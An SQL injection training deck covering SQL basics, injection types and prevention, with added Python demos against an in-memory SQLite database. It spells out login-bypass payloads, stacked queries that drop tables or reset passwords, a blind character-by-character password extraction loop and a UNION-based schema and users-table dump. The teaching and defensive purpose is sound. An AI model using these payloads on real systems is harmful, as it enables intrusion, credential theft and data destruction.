2. Table of Contents
1 What is SQL Injection?
Explaining what SQL injection really is, in depth, and why we need to know about it.
2 Variety of SQL Injection Methods
Explaining the different types of SQL injection method and how each one works.
3. Table of Contents (continued)
3 SQL Injection Tutorial
We are going to go through a SQL injection war game to show how SQL injection really works, live.
4 Ways to Prevent SQL Injection
We will go through how we can prevent SQL injection from happening to our website.
5 Review
We will quickly review what we have learned today.
5. What is SQL?
• Structured Query Language (a standard language)
• Vendors add proprietary extensions on top of the standard
• Statements
  • SELECT
  • INSERT
  • UPDATE
  • DELETE
  • Etc.…
• Variety of dialects
  • T-SQL
  • PL/SQL
  • Jet SQL
  • Many more
7. Reasons Why SQL
1 Allows users to access data in relational database management systems
2 Allows SQL to be embedded within other languages using SQL modules, libraries and precompilers
3 Allows users to set permissions on tables, procedures and views
4 Tons more reasons to use SQL!
9. History of SQL
1970 Dr. Edgar F. "Ted" Codd of IBM, known as the father of relational databases, described a relational model for databases.
1974 Structured Query Language appeared.
1978 IBM worked to develop Codd's ideas and released the first prototype relational database, a product named System/R. Soon after, the first commercial relational database was released by Relational Software, which later became Oracle.
1986 SQL was standardized by ANSI.
28. Update Statements
• Modifies one or more existing rows of data within a table
• Changes values that already exist
• Similar to an INSERT statement, but it usually contains a WHERE clause that selects which rows to change
53. What is SQL Injection?
• Injecting arbitrary pieces of malicious SQL into an application's query
• Executed as code by the back-end SQL server
• Giving undesired results
• Executing code through vulnerable input parameters
• Can compromise the whole system
54. History of SQL Injection
1999 The Common Vulnerabilities and Exposures (CVE) dictionary has existed since 1999 to keep track of known software vulnerabilities and alert consumers and developers alike.
2003 SQL injection appeared on the OWASP Top 10 list.
2013 SQL injection was the number one vulnerability in the OWASP Top 10.
cont. SQL injection continues to be at the top of the vulnerability lists of many organizations.
57. Richard Alan Clarke
"If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked."
58. How SQL Injection Works
1 Attacker sends data containing SQL fragments
2 Custom code: the application concatenates that data into a query, sends the modified query to the database, and the query returns values
3 Attacker views unauthorized data
Example: $sql = "SELECT * FROM table WHERE id='" . $_REQUEST['id'] . "'";
59. Types of SQL Injection
• Union based
• Inclusive
• Error based
• Boolean (blind)
• Executing
• Time (blind)
• Schema discovery
• Tautology
• Single quote
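The following is an added example, not code from the original deck: it reproduces the three-step flow of slide 58 and two of the types listed above (tautology and boolean-based blind) in Python against an in-memory SQLite database, which stands in for the unnamed back end. The table names, rows and the `admin` password are constructed for the example. `lookup_vulnerable` builds the query exactly the way the PHP one-liner does; `lookup_safe` is the parameterised form that the same payloads cannot break out of.

```python
import sqlite3


def seed() -> sqlite3.Connection:
    """Constructed sample database for this example (not from the original deck)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99), (3, 'gizmo', 4.50);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, product_id: str) -> list:
    # Step 2 of the slide: the request value is pasted into the statement text,
    # just like "SELECT * FROM table WHERE id='" . $_REQUEST['id'] . "'".
    # A quote in the value ends the literal and the rest is parsed as SQL.
    sql = f"SELECT id, name, price FROM products WHERE id='{product_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, product_id: str) -> list:
    # Parameterised query: the value is bound separately from the statement
    # text, so the database never tokenises it as SQL.
    sql = "SELECT id, name, price FROM products WHERE id=?"
    return conn.execute(sql, (product_id,)).fetchall()


def tautology(conn: sqlite3.Connection) -> list:
    # Steps 1 and 3: "1' OR 1=1--" makes the WHERE clause true for every row and
    # the trailing "--" comments out the quote the application appends.
    return lookup_vulnerable(conn, "1' OR 1=1--")


def blind_extract(conn: sqlite3.Connection, username: str, length: int) -> str:
    # Boolean-based (blind) injection: the page only reveals "row" or "no row",
    # but one yes/no question per character position is enough to read a value
    # from a table the original query never touched.
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            payload = (f"1' AND (SELECT substr(password,{pos},1) FROM users "
                       f"WHERE username='{username}')='{ch}")
            if lookup_vulnerable(conn, payload):
                recovered += ch
                break
    return recovered


if __name__ == "__main__":
    db = seed()
    print("normal lookup:", lookup_vulnerable(db, "1"))
    print("tautology:", tautology(db))
    print("blind extraction:", blind_extract(db, "admin", 6))
    print("parameterised, same payload:", lookup_safe(db, "1' OR 1=1--"))
```

The blind loop costs one request per guess, which is why time-based variants exist: when the page shows no difference at all, the attacker asks the database to delay the response instead (SQLite has no sleep function, so that variant is not shown here).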
76. Circumventing Access Controls
UserName = johnsmith' or 1=1--
Password = p@ssword
SELECT COUNT(*) FROM Users WHERE UserName='johnsmith' or 1=1--' AND Password='p@ssword'
The OR makes the condition true for every row, and everything after -- is a comment, so the password is never checked.
77. Circumventing Access Controls
UserName = johnsmith' and 1=1--
Password = p@ssword
SELECT COUNT(*) FROM Users WHERE UserName='johnsmith' and 1=1--' AND Password='p@ssword'
The AND keeps the username test, so the count is 1 if johnsmith exists and 0 otherwise; the password check is commented out.
78. Circumventing Access Controls
UserName = johnsmith'--
Password = p@ssword
SELECT COUNT(*) FROM Users WHERE UserName='johnsmith'--' AND Password='p@ssword'
Closing the literal and commenting out the rest is enough: no boolean trick is needed.
79. Modifying Data and DB Objects
If the driver lets the injected string start a second statement (stacked queries), the attacker is no longer limited to reading data:
UserName = johnsmith';update users set password='foo'--
UserName = johnsmith';update item set price=price-1--
UserName = johnsmith';insert into …
UserName = johnsmith';drop table users--
UserName = johnsmith';create login …
133. Basic Attack Success Criteria
• The app needs to return internal exceptions which bubble up from the underlying database
• The query structure needs to allow the UNION operator to be injected, and the injected vector needs to return results to the app
• The command executed on the database can be manipulated by the attacker
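An added example (Python with the standard sqlite3 module, not the deck's own code) that exercises the three criteria in order: a page that leaks the raw database error, the column-count probe that makes a UNION parse, and the schema discovery that follows once it does. The `products` and `users` tables and the two page functions are constructed for the example; `sqlite_master` is SQLite's catalogue table, the counterpart of `information_schema` on most other engines.

```python
import sqlite3


def seed() -> sqlite3.Connection:
    """Constructed sample schema for this example (not from the original deck)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99);
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
    """)
    return conn


QUERY = "SELECT name, price FROM products WHERE id='{}'"   # injectable, two result columns


def page_verbose(conn: sqlite3.Connection, product_id: str) -> dict:
    # Criterion 1 as stated on the slide: the database exception bubbles up to
    # the client, so the attacker reads the engine's own error text.
    try:
        return {"rows": conn.execute(QUERY.format(product_id)).fetchall(), "error": None}
    except sqlite3.Error as exc:
        return {"rows": [], "error": str(exc)}


def page_generic(conn: sqlite3.Connection, product_id: str) -> dict:
    # Same injectable query, but every exception becomes one fixed message.
    try:
        return {"rows": conn.execute(QUERY.format(product_id)).fetchall(), "error": None}
    except sqlite3.Error:
        return {"rows": [], "error": "something went wrong"}


def probe_column_count(page, conn: sqlite3.Connection, max_cols: int = 8):
    # Criterion 2: a UNION only parses when both SELECTs have the same number of
    # columns, so append UNION SELECT NULL,NULL,... until the page stops erroring.
    # Only the error/no-error difference is needed, not the error text.
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if page(conn, f"x' UNION SELECT {nulls}--")["error"] is None:
            return n
    return None


def dump_schema(page, conn: sqlite3.Connection, ncols: int) -> dict:
    # Schema discovery: with the column count known, ride the UNION to read the
    # catalogue. 'x' matches no product, so every row comes from the injected SELECT.
    if ncols < 2:
        raise ValueError("need at least two result columns to return name and sql")
    cols = ["name", "sql"] + ["NULL"] * (ncols - 2)
    rows = page(conn, f"x' UNION SELECT {','.join(cols)} FROM sqlite_master "
                      f"WHERE type='table'--")["rows"]
    return {row[0]: row[1] for row in rows}


def dump_table(page, conn: sqlite3.Connection, table: str, columns: list) -> list:
    # Criterion 3 in action: the attacker now decides what the statement returns.
    return page(conn, f"x' UNION SELECT {','.join(columns)} FROM {table}--")["rows"]


if __name__ == "__main__":
    db = seed()
    print("leaked error:", page_verbose(db, "'")["error"])
    n = probe_column_count(page_generic, db)
    print("result columns:", n)
    print("tables:", dump_schema(page_generic, db, n))
    print("users:", dump_table(page_generic, db, "users", ["username", "password"]))
```

Note that the probe and the dumps succeed against `page_generic` as well: hiding the exception text removes the convenience of reading the engine's message, but as long as an error and a normal response are distinguishable the oracle the first criterion describes still exists. The fix is the parameterised query, not a friendlier error page.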